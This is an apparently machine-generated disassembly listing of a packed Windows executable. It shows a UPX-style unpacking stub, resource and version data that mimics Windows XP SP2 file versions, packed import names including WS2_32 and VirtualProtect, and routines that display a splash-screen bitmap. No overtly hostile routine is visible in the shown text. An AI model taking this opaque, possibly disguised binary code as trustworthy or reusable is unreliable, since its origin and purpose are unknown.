dd 5611730Dh, 0A826218h, 0E7490002h, 33407C80h, 7FBB0002h
dd 2736010Fh, 8C289647h, 4040284Eh, 39009600h, 8400D042h
dd 341ECDF8h, 0D8526230h, 442E238Ah, 0D44B02B0h, 9C9C9501h
dd 2826444Ah, 0A824B62Fh, 4AFB9B33h, 0AC7C1109h, 0F000232Ch
dd 0CC0D8249h, 0C3h, 0
dd 0FF480000h, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_406000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_40E152
; ---------------------------------------------------------------------------
align 8
loc_40E148: ; CODE XREF: _1:loc_40E159�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40E14E: ; CODE XREF: _1:0040E1E6�j _1:0040E1FD�j
add ebx, ebx
jnz short loc_40E159
loc_40E152: ; CODE XREF: _1:0040E140�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40E159: ; CODE XREF: _1:0040E150�j
jb short loc_40E148
mov eax, 1
loc_40E160: ; CODE XREF: _1:0040E16F�j _1:0040E17A�j
add ebx, ebx
jnz short loc_40E16B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40E16B: ; CODE XREF: _1:0040E162�j
adc eax, eax
add ebx, ebx
jnb short loc_40E160
jnz short loc_40E17C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40E160
loc_40E17C: ; CODE XREF: _1:0040E171�j
xor ecx, ecx
sub eax, 3
jb short loc_40E190
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_40E202
mov ebp, eax
loc_40E190: ; CODE XREF: _1:0040E181�j
add ebx, ebx
jnz short loc_40E19B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40E19B: ; CODE XREF: _1:0040E192�j
adc ecx, ecx
add ebx, ebx
jnz short loc_40E1A8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40E1A8: ; CODE XREF: _1:0040E19F�j
adc ecx, ecx
jnz short loc_40E1CC
inc ecx
loc_40E1AD: ; CODE XREF: _1:0040E1BC�j _1:0040E1C7�j
add ebx, ebx
jnz short loc_40E1B8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40E1B8: ; CODE XREF: _1:0040E1AF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_40E1AD
jnz short loc_40E1C9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40E1AD
loc_40E1C9: ; CODE XREF: _1:0040E1BE�j
add ecx, 2
loc_40E1CC: ; CODE XREF: _1:0040E1AA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40E1EC
loc_40E1DD: ; CODE XREF: _1:0040E1E4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40E1DD
jmp loc_40E14E
; ---------------------------------------------------------------------------
align 4
loc_40E1EC: ; CODE XREF: _1:0040E1DB�j _1:0040E1F9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40E1EC
add edi, ecx
jmp loc_40E14E
; ---------------------------------------------------------------------------
loc_40E202: ; CODE XREF: _1:0040E18C�j
pop esi
mov edi, esi
mov ecx, 0CCh
loc_40E20A: ; CODE XREF: _1:0040E211�j _1:0040E216�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40E20F: ; CODE XREF: _1:0040E234�j
cmp al, 1
ja short loc_40E20A
cmp byte ptr [edi], 1
jnz short loc_40E20A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_40E20F
lea edi, [esi+0C000h]
loc_40E23C: ; CODE XREF: _1:0040E25E�j
mov eax, [edi]
or eax, eax
jz short loc_40E287
mov ebx, [edi+4]
lea eax, [eax+esi+0E8E8h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+0E974h]
xchg eax, ebp
loc_40E259: ; CODE XREF: _1:0040E27F�j
mov al, [edi]
inc edi
or al, al
jz short loc_40E23C
mov ecx, edi
jns short near ptr loc_40E26A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_40E26A: ; CODE XREF: _1:0040E262�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+0E978h]
or eax, eax
jz short loc_40E281
mov [ebx], eax
add ebx, 4
jmp short loc_40E259
; ---------------------------------------------------------------------------
loc_40E281: ; CODE XREF: _1:0040E278�j
call dword ptr [esi+0E980h]
loc_40E287: ; CODE XREF: _1:0040E240�j
mov ebp, [esi+0E97Ch]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+20Fh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp-80h]
loc_40E2BB: ; CODE XREF: _1:0040E2BF�j
push 0
cmp esp, eax
jnz short loc_40E2BB
sub esp, 0FFFFFF80h
jmp loc_40284E
; ---------------------------------------------------------------------------
align 4
dd 8 dup(0)
dd 0E130BF00h, 0F78B0040h, 69B9h, 0F4378000h, 0E201C783h
dd 0E6FFF8h, 33Fh dup(0)
_1 ends
; Section 3. (virtual address 0000F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0000F000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_2 segment para public 'CODE' use32
assume cs:_2
;org 40F000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 30001h, 80000190h, 80000030h, 3, 800000A0h, 0Eh, 80000110h
dd 10h, 80000150h, 3 dup(0)
dd 20000h, 81h, 80000050h, 83h, 80000078h, 3 dup(0)
dd 10000h, 0
dd 68h, 4198h, 2200h, 5 dup(0)
dd 10000h, 419h, 90h, 6398h, 6000h, 5 dup(0)
dd 20000h, 1, 800000C0h, 2, 800000E8h, 3 dup(0)
dd 10000h, 419h, 0D8h, 0F19Ch, 2E8h, 5 dup(0)
dd 10000h, 419h, 100h, 0F488h, 128h, 5 dup(0)
dd 10000h, 80h, 80000128h, 3 dup(0)
dd 10000h, 419h, 140h, 0F5B4h, 22h, 5 dup(0)
dd 10000h, 1, 80000168h, 3 dup(0)
dd 10000h, 409h, 180h, 0F5DCh, 30Ch, 2 dup(0)
dd 440003h, 4C004Ch, 0C398h, 28h, 20h, 40h, 40001h, 0
dd 280h, 5 dup(0)
dd 800000h, 8000h, 808000h, 80h, 800080h, 8080h, 0C0C0C0h
dd 808080h, 0FF0000h, 0FF00h, 0FFFF00h, 0FFh, 0FF00FFh
dd 0FFFFh, 0FFFFFFh, 8 dup(0)
dd 3 dup(88888888h), 80888888h, 77777787h, 2 dup(77777777h)
dd 80777777h, 0FFFF8F87h, 2 dup(0FFFFFFFFh), 80F7FFFFh
dd 0FFFF8F87h, 2 dup(0FFFFFFFFh), 80F7FFFFh, 0FFFF8F87h
dd 2 dup(0FFFFFFFFh), 80F7FFFFh, 0FFFF8F87h, 2 dup(0FFFFFFFFh)
dd 80F7FFFFh, 0FFFF8F87h, 2 dup(0FFFFFFFFh), 80F7FFFFh
dd 0FFFF8F87h, 2 dup(0FFFFFFFFh), 80F7FFFFh, 0FFFF8F87h
dd 2 dup(0FFFFFFFFh), 80F7FFFFh, 0FFFF8F87h, 2 dup(0FFFFFFFFh)
dd 80F7FFFFh, 0FFFF8F87h, 2 dup(0FFFFFFFFh), 80F7FFFFh
dd 0FFFF8F87h, 2 dup(0FFFFFFFFh), 80F7FFFFh, 0FFFF8F87h
dd 2 dup(0FFFFFFFFh), 80F7FFFFh, 0FFFF8F87h, 2 dup(0FFFFFFFFh)
dd 80F7FFFFh, 0FFFF8F87h, 2 dup(0FFFFFFFFh), 80F7FFFFh
dd 0FFFF8F87h, 2 dup(0FFFFFFFFh), 80F7FFFFh, 0FFFF8F87h
dd 2 dup(0FFFFFFFFh), 80F7FFFFh, 0FFFF8F87h, 2 dup(0FFFFFFFFh)
dd 80F7FFFFh, 0FFFF8F87h, 2 dup(0FFFFFFFFh), 80F7FFFFh
dd 0FFFF8F87h, 2 dup(0FFFFFFFFh), 80F7FFFFh, 88888887h
dd 2 dup(88888888h), 80878888h, 77777787h, 2 dup(77777777h)
dd 80777777h, 44444487h, 44444444h, 404444h, 80000000h
dd 44444487h, 44444444h, 70474444h, 80700777h, 44444487h
dd 44444444h, 70474444h, 80700777h, 44444487h, 2 dup(44444444h)
dd 80444444h, 77777787h, 2 dup(77777777h), 80777777h, 3 dup(88888888h)
dd 80888888h, 8 dup(0)
dd 0FFFFFFFFh, 1Dh dup(0)
dd 2 dup(0FFFFFFFFh), 0C680h, 28h, 10h, 20h, 40001h, 0
dd 80h, 5 dup(0)
dd 800000h, 8000h, 808000h, 80h, 800080h, 8080h, 0C0C0C0h
dd 808080h, 0FF0000h, 0FF00h, 0FFFF00h, 0FFh, 0FF00FFh
dd 0FFFFh, 0FFFFFFh, 2 dup(0FF0000FFh), 0
dd 0E00Eh, 2 dup(0E0h), 0E0EEh, 0E0h, 2 dup(0EE0h), 2 dup(0F0EFEEh)
dd 0F0FFFFEFh, 0F0FFFF0Fh, 0EF00FC0h, 0CF00F00h, 0E00C0CCh
dd 0CC0C0000h, 0EE0CCCCh, 0C4CC0000h, 0EEE0CCCCh, 4CCC0000h
dd 0EEECCC4h, 0CCC40000h, 0FE0444Ch, 0C4CC00F0h, 0FF0F4444h
dd 4444F0FFh, 0F404444h, 444404F0h, 40444444h, 44444404h
dd 10h dup(0)
dd 0C7A8h, 10000h, 20200002h, 10010h, 2E80004h, 10000h
dd 101010h, 40001h, 128h, 2, 0C7CCh, 34030Ch, 560000h
dd 5F0053h, 450056h, 530052h, 4F0049h, 5F004Eh, 4E0049h
dd 4F0046h, 0
dd 0FEEF04BDh, 10000h, 50001h, 0A280884h, 50001h, 0A280884h
dd 3Fh, 0
dd 4, 1, 3 dup(0)
dd 26Ch, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h
dd 66006Eh, 6Fh, 248h, 300001h, 300034h, 300039h, 620034h
dd 30h, 18h, 430001h, 6D006Fh, 65006Dh, 74006Eh, 73h, 20h
dd 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh, 65006Dh
dd 0
dd 28h, 460001h, 6C0069h, 440065h, 730065h, 720063h, 700069h
dd 690074h, 6E006Fh, 0
dd 0E003Ch, 460001h, 6C0069h, 560065h, 720065h, 690073h
dd 6E006Fh, 0
a5_1_2600_2180:
unicode 0, <5.1.2600.2180>,0
unicode 0, < >,0
dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch, 6D0061h
dd 65h, 13004Ah, 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h
dd 690072h, 680067h, 74h, 6F0043h, 790070h, 690072h, 680067h
dd 200074h, 430028h, 200029h, 300032h, 370030h, 0
dd 28h, 4C0001h, 670065h, 6C0061h, 720054h, 640061h, 6D0065h
dd 720061h, 73006Bh, 0
dd 28h, 4F0001h, 690072h, 690067h, 61006Eh, 46006Ch, 6C0069h
dd 6E0065h, 6D0061h, 65h, 20h, 500001h, 690072h, 610076h
dd 650074h, 750042h, 6C0069h, 64h, 20h, 500001h, 6F0072h
dd 750064h, 740063h, 61004Eh, 65006Dh, 0
dd 290076h, 500001h, 6F0072h, 750064h, 740063h, 650056h
dd 730072h, 6F0069h, 6Eh, 2E0035h, 2E0031h, 360032h, 300030h
dd 32002Eh, 380031h, 200030h, 780028h, 730070h, 5F0070h
dd 700073h, 5F0032h, 740072h, 2E006Dh, 340030h, 380030h
dd 330030h, 32002Dh, 350031h, 290038h, 0
dd 20h, 530001h, 650070h, 690063h, 6C0061h, 750042h, 6C0069h
dd 64h, 44h, 560001h, 720061h, 690046h, 65006Ch, 6E0049h
dd 6F0066h, 0
dd 40024h, 540000h, 610072h, 73006Eh, 61006Ch, 690074h
dd 6E006Fh, 0
dd 4B00409h, 0
dd 0FFFFFFFEh, 0
dd 0F9B0h, 0F974h, 0
dd 0FFFFFFFEh, 0
dd 0F9BDh, 0F988h, 0
dd 0FFFFFFFEh, 0
; ---------------------------------------------------------------------------
retf 0F9h
; ---------------------------------------------------------------------------
align 10h
db 90h
db 0F9h, 2 dup(0)
align 8
dd 0FFFFFFFEh, 0
dd 0F9D4h, 0F998h, 0
dd 0FFFFFFFEh, 0
dd 0F9DFh, 0F9A0h, 0
dd 0FFFFFFFEh, 0
dd 0F9EAh, 0F9A8h, 5 dup(0)
dd offset sub_41E15D
dd offset sub_41E33E
dd 77E6169Ah, 41D6FEh, 0
dd 77DD189Ah, 0
dd 73E3A49Dh, 0
dd 77C37ADCh, 0
dd 77CC7CB6h, 0
dd 71AB6738h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 464D006Ch, 2E323443h, 4C4C44h, 4356534Dh
dd 642E5452h, 52006C6Ch, 54524350h, 6C642E34h, 5357006Ch
dd 32335F32h, 6C6C642Eh, 6F4C0000h, 694C6461h, 72617262h
dd 4179h, 50746547h, 41636F72h, 65726464h, 7373h, 74726956h
dd 506C6175h, 65746F72h, 7463h, 74697845h, 636F7250h, 737365h
dd 65520000h, 6F6C4367h, 654B6573h, 79h, 74697865h, 75550000h
dd 72436469h, 65746165h, 53570000h, 756E4543h, 6F72506Dh
dd 6F636F74h, 736Ch, 167h dup(0)
_2 ends
; Section 4. (virtual address 00010000)
; Virtual size : 00010D8F ( 69007.)
; Section size in file : 00010D8F ( 69007.)
; Offset to raw data for section: 00010000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_3 segment para public 'CODE' use32
assume cs:_3
;org 410000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410000 proc near ; CODE XREF: sub_41365E+84�p
; sub_41396C+333�p ...
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4212D8
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov esi, ecx
mov [ebp+var_1C], esi
lea eax, [esi+10h]
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
and [ebp+var_4], 0
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, esi
call sub_41EC69
or [ebp+var_4], 0FFFFFFFFh
call sub_410060
loc_41004C: ; DATA XREF: _0:off_401240�o
; _0:off_401264�o
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_410000 endp
; =============== S U B R O U T I N E =======================================
sub_41005D proc near ; DATA XREF: _4:004212E0�o
mov esi, [ebp-1Ch]
sub_41005D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_410060 proc near ; CODE XREF: sub_410000+47�p
add esi, 10h
push esi
call ds:dword_421018 ; RtlLeaveCriticalSection
retn
sub_410060 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41006B proc near ; CODE XREF: sub_413186+9B�p
; sub_413186+C4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
push edi
test edx, edx
jz short loc_41007D
mov edi, [ebp+arg_0]
test edi, edi
jnz short loc_410081
loc_41007D: ; CODE XREF: sub_41006B+9�j
xor eax, eax
jmp short loc_4100D3
; ---------------------------------------------------------------------------
loc_410081: ; CODE XREF: sub_41006B+10�j
cmp byte ptr [edx], 0
jnz short loc_41008F
xor eax, eax
cmp [edi], al
setz al
jmp short loc_4100D3
; ---------------------------------------------------------------------------
loc_41008F: ; CODE XREF: sub_41006B+19�j
push ebx
push esi
mov esi, offset dword_423BBC
mov eax, edi
loc_410098: ; CODE XREF: sub_41006B+49�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_4100BA
test cl, cl
jz short loc_4100B6
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_4100BA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_410098
loc_4100B6: ; CODE XREF: sub_41006B+37�j
xor eax, eax
jmp short loc_4100BF
; ---------------------------------------------------------------------------
loc_4100BA: ; CODE XREF: sub_41006B+33�j
; sub_41006B+41�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4100BF: ; CODE XREF: sub_41006B+4D�j
pop esi
pop ebx
test eax, eax
jnz short loc_4100CA
mov edi, offset dword_423BB8
loc_4100CA: ; CODE XREF: sub_41006B+58�j
push edx
push edi
call sub_4100D6
pop ecx
pop ecx
loc_4100D3: ; CODE XREF: sub_41006B+14�j
; sub_41006B+22�j
pop edi
pop ebp
retn
sub_41006B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4100D6 proc near ; CODE XREF: sub_41006B+61�p
; sub_4100D6+70�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov al, [ebx]
push edi
test al, al
jz short loc_410120
loc_4100E8: ; CODE XREF: sub_4100D6+48�j
movsx edi, byte ptr [esi]
movsx eax, al
inc ebx
cmp eax, 2Ah
jz short loc_410130
cmp eax, 3Fh
jz short loc_410115
push eax
call sub_41072E
mov edx, eax
push edi
mov [ebp+arg_4], edx
call sub_41072E
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_41012C
jmp short loc_410119
; ---------------------------------------------------------------------------
loc_410115: ; CODE XREF: sub_4100D6+21�j
test edi, edi
jz short loc_41012C
loc_410119: ; CODE XREF: sub_4100D6+3D�j
mov al, [ebx]
inc esi
test al, al
jnz short loc_4100E8
loc_410120: ; CODE XREF: sub_4100D6+10�j
xor eax, eax
cmp [esi], al
setz al
loc_410127: ; CODE XREF: sub_4100D6+58�j
; sub_4100D6+86�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41012C: ; CODE XREF: sub_4100D6+3B�j
; sub_4100D6+41�j ...
xor eax, eax
jmp short loc_410127
; ---------------------------------------------------------------------------
loc_410130: ; CODE XREF: sub_4100D6+1C�j
xor edi, edi
cmp byte ptr [esi], 0
jz short loc_410142
loc_410137: ; CODE XREF: sub_4100D6+66�j
inc edi
cmp byte ptr [edi+esi], 0
jnz short loc_410137
test edi, edi
jl short loc_41012C
loc_410142: ; CODE XREF: sub_4100D6+5F�j
add esi, edi
loc_410144: ; CODE XREF: sub_4100D6+7F�j
push esi
push ebx
call sub_4100D6
pop ecx
test eax, eax
pop ecx
jnz short loc_410159
dec edi
dec esi
test edi, edi
jge short loc_410144
jmp short loc_41012C
; ---------------------------------------------------------------------------
loc_410159: ; CODE XREF: sub_4100D6+79�j
push 1
pop eax
jmp short loc_410127
sub_4100D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41015E proc near ; DATA XREF: sub_410253+36�o
var_60 = dword ptr -60h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 60h
push edi
cmp [ebp+arg_4], 0Fh
jnz loc_4101FF
and [ebp+var_20], 0
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
stosd
lea eax, [ebp+var_20]
push eax
push 18h
push ds:dword_4289B0
call ds:dword_424778 ; GetObjectA
lea eax, [ebp+var_60]
push eax
push [ebp+arg_0]
call ds:dword_424770 ; BeginPaint
push [ebp+var_60]
call ds:dword_424760 ; CreateCompatibleDC
mov [ebp+var_8], eax
push ds:dword_4289B0
push [ebp+var_8]
call ds:dword_42477C ; SelectObject
mov [ebp+var_4], eax
push 0CC0020h
push 0
push 0
push [ebp+var_8]
push [ebp+var_18]
push [ebp+var_1C]
push 0
push 0
push [ebp+var_60]
call ds:dword_424784 ; BitBlt
push [ebp+var_4]
push [ebp+var_8]
call ds:dword_42477C ; SelectObject
push [ebp+var_8]
call ds:dword_424768 ; DeleteDC
lea eax, [ebp+var_60]
push eax
push [ebp+arg_0]
call ds:dword_424774 ; EndPaint
xor eax, eax
jmp short loc_410211
; ---------------------------------------------------------------------------
loc_4101FF: ; CODE XREF: sub_41015E+B�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42104C ; DefWindowProcA
loc_410211: ; CODE XREF: sub_41015E+9F�j
pop edi
leave
retn 10h
sub_41015E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410216 proc near ; DATA XREF: sub_410253+121�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call ds:dword_424788 ; GetWindowThreadProcessId
call ds:dword_424668 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_41024C
push [ebp+arg_0]
call ds:dword_42478C ; SetActiveWindow
push [ebp+arg_0]
call ds:dword_424790 ; SetForegroundWindow
xor eax, eax
jmp short locret_41024F
; ---------------------------------------------------------------------------
loc_41024C: ; CODE XREF: sub_410216+1E�j
push 1
pop eax
locret_41024F: ; CODE XREF: sub_410216+34�j
leave
retn 8
sub_410216 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410253 proc near ; DATA XREF: sub_410386+3C�o
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push edi
mov eax, [ebp+arg_0]
mov ds:dword_4289B0, eax
and [ebp+var_24], 0
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
stosd
stosd
lea eax, [ebp+var_24]
push eax
push 18h
push [ebp+arg_0]
call ds:dword_424778 ; GetObjectA
mov ds:dword_4289C0, 30h
mov ds:dword_4289C8, offset sub_41015E
mov ds:dword_4289E8, offset aCc7574e45e3947 ; "{CC7574E4-5E39-4700-B286-269A82DD8E95}"
push 0
call ds:dword_424698 ; GetModuleHandleA
mov ds:dword_4289D4, eax
push offset dword_4289C0
call ds:dword_424794 ; RegisterClassExA
push 10h
call ds:dword_424798 ; GetSystemMetrics
mov [ebp+var_C], eax
push 11h
call ds:dword_424798 ; GetSystemMetrics
mov [ebp+var_8], eax
push 0
push 0
push 0
push 0
push [ebp+var_1C]
push [ebp+var_20]
mov eax, [ebp+var_8]
sub eax, [ebp+var_1C]
cdq
sub eax, edx
sar eax, 1
push eax
mov eax, [ebp+var_C]
sub eax, [ebp+var_20]
cdq
sub eax, edx
sar eax, 1
push eax
push 98800000h
push offset dword_424898
push offset aCc7574e45e3947 ; "{CC7574E4-5E39-4700-B286-269A82DD8E95}"
push 0
call ds:dword_42479C ; CreateWindowExA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ds:dword_4289B4, eax
loc_410313: ; CODE XREF: sub_410253+F9�j
push 0
push 0
push [ebp+var_4]
lea eax, [ebp+var_40]
push eax
call ds:dword_4247A0 ; GetMessageA
test eax, eax
jz short loc_41034E
mov eax, [ebp+var_40]
cmp eax, [ebp+var_4]
jnz short loc_410338
cmp [ebp+var_3C], 0
jnz short loc_410338
jmp short loc_41034E
; ---------------------------------------------------------------------------
loc_410338: ; CODE XREF: sub_410253+DB�j
; sub_410253+E1�j
lea eax, [ebp+var_40]
push eax
call ds:dword_4247A4 ; TranslateMessage
lea eax, [ebp+var_40]
push eax
call ds:dword_4247A8 ; DispatchMessageA
jmp short loc_410313
; ---------------------------------------------------------------------------
loc_41034E: ; CODE XREF: sub_410253+D3�j
; sub_410253+E3�j
push 3E8h
call ds:dword_424714 ; Sleep
push [ebp+var_4]
call ds:dword_4247AC ; DestroyWindow
and ds:dword_4289B4, 0
push [ebp+arg_0]
call ds:dword_424780 ; DeleteObject
push 0
push offset sub_410216
call ds:dword_4247B0 ; EnumWindows
xor eax, eax
pop edi
leave
retn 4
sub_410253 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410386 proc near ; CODE XREF: sub_418780+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push 0
lea eax, [ebp+var_4]
push eax
push 3
push 80000000h
push offset a_splashscreen_ ; "_splashscreen.bmp"
call sub_414344
test eax, eax
jz short locret_4103E3
push [ebp+var_4]
call sub_418F16
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4103D9
push offset dword_4289B8
push 0
push [ebp+var_8]
push offset sub_410253
push 0
push 0
call ds:dword_4247BC ; CreateThread
push 64h
call ds:dword_424714 ; Sleep
loc_4103D9: ; CODE XREF: sub_410386+30�j
push 0
push [ebp+var_4]
call sub_41473F
locret_4103E3: ; CODE XREF: sub_410386+1E�j
leave
retn
sub_410386 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103E8 proc near ; CODE XREF: sub_4104E0+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_410400
push [ebp+arg_0]
call sub_410F00 ; RtlUnwind
loc_410400: ; DATA XREF: sub_4103E8+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4103E8 endp
; =============== S U B R O U T I N E =======================================
sub_410408 proc near ; DATA XREF: sub_41042A+A�o
; _3:0041049B�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_410429
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_410429: ; CODE XREF: sub_410408+10�j
retn
sub_410408 endp
; =============== S U B R O U T I N E =======================================
sub_41042A proc near ; CODE XREF: sub_4104E0+67�p
; sub_4104E0+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_410408
push large dword ptr fs:0
mov large fs:0, esp
loc_410447: ; CODE XREF: sub_41042A:loc_410482�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_410484
cmp esi, [esp+1Ch+arg_4]
jz short loc_410484
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_410482
push 101h
mov eax, [ebx+esi*4+8]
call sub_4104BE
call dword ptr [ebx+esi*4+8]
loc_410482: ; CODE XREF: sub_41042A+44�j
jmp short loc_410447
; ---------------------------------------------------------------------------
loc_410484: ; CODE XREF: sub_41042A+2A�j
; sub_41042A+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41042A endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_410408
jnz short locret_4104B4
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_4104B4
mov eax, 1
locret_4104B4: ; CODE XREF: _3:004104A2�j _3:004104AD�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_4243B8
jmp short loc_4104C8
; =============== S U B R O U T I N E =======================================
sub_4104BE proc near ; CODE XREF: sub_41042A+4F�p
; sub_4104E0+78�p
push ebx
push ecx
mov ebx, offset dword_4243B8
mov ecx, [ebp+8]
loc_4104C8: ; CODE XREF: _3:004104BC�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_4104BE endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104E0 proc near ; DATA XREF: sub_410000+A�o
; sub_410A10+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_410580
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
